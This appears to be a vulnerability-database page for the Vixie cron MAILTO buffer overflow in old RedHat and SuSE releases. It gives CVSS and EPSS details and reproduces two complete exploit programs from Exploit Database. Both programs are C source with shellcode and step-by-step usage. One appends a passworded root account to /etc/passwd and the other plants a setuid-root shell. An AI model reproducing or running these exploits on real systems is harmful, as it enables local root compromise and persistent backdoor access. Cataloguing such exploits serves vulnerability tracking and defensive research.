Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
7.5 |
|
AV:N/AC:L/Au:N/C:P/I:P/A:P |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 19469
Publication date : 1999-08-29 22h00 +00:00
Author : Akke
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/602/info
The version of Vixie cron that ships with RedHat versions 4.2, 5.2 and 6.0 is vulnerable to a local buffer overflow attack. By utilizing the MAILTO environment variable, a buffer can be overflown in the cron_popen() function, allowing an attacker to execute arbitrary code. Vixie cron daemon is installed setuid root by default, allowing for a local root compromise. Recent versions of Debian GNU/Linux have been confirmed to not be vulnerable to this attack.
/*
vixie-crontab-3.0.1 cron_popen() exploit by Akke - 30-8-99
Akke <
[email protected]>
how to compile ?
gcc crontab_exploit.c -o crontab_exploit
how to use ?
./crontab_exploit
crontab ./CrOn
wait 1 minute
crontab -r
su -l cronexpl (password = exploited) (this is root account)
Greets to: bugtraq
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/ce";
#define max_buf_len 1000
#define CronFile "CrOn"
#define RootScript "/tmp/cron_root"
#define CronEchoScript "/tmp/cron_echo"
#define chmod_bin "/bin/chmod"
int main()
{
char crontab_file_string[max_buf_len];
char temp[max_buf_len];
FILE *fp;
int i;
strcpy(temp,
"T h i s _ i s _ a _ s i m p l e _ e x p l o i t _ w r i t t e n _ b y _ A K K E _ "
"T h i s _ i s _ a _ s i m p l e _ e x p l o i t _ w r i t t e n _ b y _ A K K E _ "
"_ _ _ _ _ _ _ _ _ _ _ _ _ _ ");
sprintf(temp,"%s%s",temp,shellcode);
sprintf(crontab_file_string,"MAILTO=%s\n",temp);
strcat(crontab_file_string,"0");
for (i=1;i<60;i++) sprintf(crontab_file_string,"%s,%d",crontab_file_string,i);
sprintf(temp," * * * * %s\n",CronEchoScript);
strcat(crontab_file_string,temp);
if ((fp = fopen(CronFile,"w+")) != NULL) {
fprintf(fp,"%s",crontab_file_string);
fclose(fp);
}
if ((fp = fopen(CronEchoScript,"w+")) != NULL) {
fprintf(fp,"#!/bin/sh\necho Wrong window!");
fclose(fp);
sprintf(temp,"%s 777 %s",chmod_bin,CronEchoScript);
system(temp);
}
if ((fp = fopen(RootScript,"w+")) != NULL) {
#define login "cronexpl"
#define passw "1T8uqGnJZ0OsQ" /* "exploited" */
fprintf(fp,"#!/bin/sh\necho %s:%s:0:0::/root:/bin/bash >> /etc/passwd\nrm %s %s %s",login,passw,CronEchoScript,"/tmp/ce",RootScript);
fclose(fp);
sprintf(temp,"%s 777 %s",chmod_bin,RootScript);
system(temp);
}
if ((fp = fopen("/tmp/ce","w+")) != NULL) {
fprintf(fp,"#!/bin/sh\n%s\n",RootScript);
fclose(fp);
sprintf(temp,"%s 777 %s",chmod_bin,"/tmp/ce");
system(temp);
}
exit(0);
}
Exploit Database EDB-ID : 19470
Publication date : 1999-08-24 22h00 +00:00
Author : jbowie
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/602/info
The version of Vixie cron that ships with RedHat versions 4.2, 5.2 and 6.0 is vulnerable to a local buffer overflow attack. By utilizing the MAILTO environment variable, a buffer can be overflown in the cron_popen() function, allowing an attacker to execute arbitrary code. Vixie cron daemon is installed setuid root by default, allowing for a local root compromise. Recent versions of Debian GNU/Linux have been confirmed to not be vulnerable to this attack.
/*
* VixieCron 3.0 Proof of Concept Exploit - w00w00
*
* Not only does Paul give up root with this one, but with his creative use of
* strtok() he actually ends up putting the address of our shellcode in eip.
*
* Many Thanks: Cheez Wiz, Sangfroid
* Thanks: stran9er, Shok
* Props: attrition.org,mea_culpa,awr,minus,Int29,napster,el8.org,w00w00
* Drops: Vixie, happyhacker.org, antionline.com, <insert your favorite web \
* defacement group here>
*
* Hellos: pm,cy,bm,ceh,jm,pf,bh,wjg,spike.
*
*
[email protected]
*
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <pwd.h>
char shellcode[] =
"\xeb\x40\x5e\x89\x76\x0c\x31\xc0\x89\x46\x0b\x89\xf3\xeb"
"\x27w00w00:Ifwewerehackerswedownyourdumbass\x8d\x4e"
"\x0c\x31\xd2\x89\x56\x16\xb0\x0b\xcd\x80\xe8\xbb\xff\xff"
"\xff/tmp/w00w00";
int
main(int argc,char *argv[])
FILE *cfile,*tmpfile;
struct stat sbuf;
struct passwd *pw;
int x;
pw = getpwuid(getuid());
chdir(pw->pw_dir);
cfile = fopen("./cronny","a+");
tmpfile = fopen("/tmp/w00w00","a+");
fprintf(cfile,"MAILTO=");
for(x=0;x<96;x++)
fprintf(cfile,"w00w00 ");
fprintf(cfile,"%s",shellcode);
fprintf(cfile,"\n* * * * * date\n");
fflush(cfile);
fprintf(tmpfile,"#!/bin/sh\ncp /bin/bash %s\nchmod 4755 %s/bash\n", pw->pw_dir,pw->pw_dir);
fflush(tmpfile);
fclose(cfile),fclose(tmpfile);
chmod("/tmp/w00w00",S_IXUSR|S_IXGRP|S_IXOTH);
if(!(fork())) {
execl("/usr/bin/crontab","crontab","./cronny",(char *)0);
} else {
printf("Waiting for shell be patient....\n");
for(;;) {
if(!(stat("./bash",&sbuf))) {
break;
} else { sleep(5); }
}
if((fork())) {
printf("Thank you for using w00warez!\n");
execl("./bash","bash",(char *)0);
} else {
remove("/tmp/w00w00");
sleep(5);
remove("./bash");
remove("./cronny");
execl("/usr/bin/crontab","crontab","-r",(char *)0);
}
}
}
Products Mentioned
Configuraton 0
Redhat>>Linux >> Version 4.2
Redhat>>Linux >> Version 5.2
Redhat>>Linux >> Version 6.0
Suse>>Suse_linux >> Version 6.0
Suse>>Suse_linux >> Version 6.1
References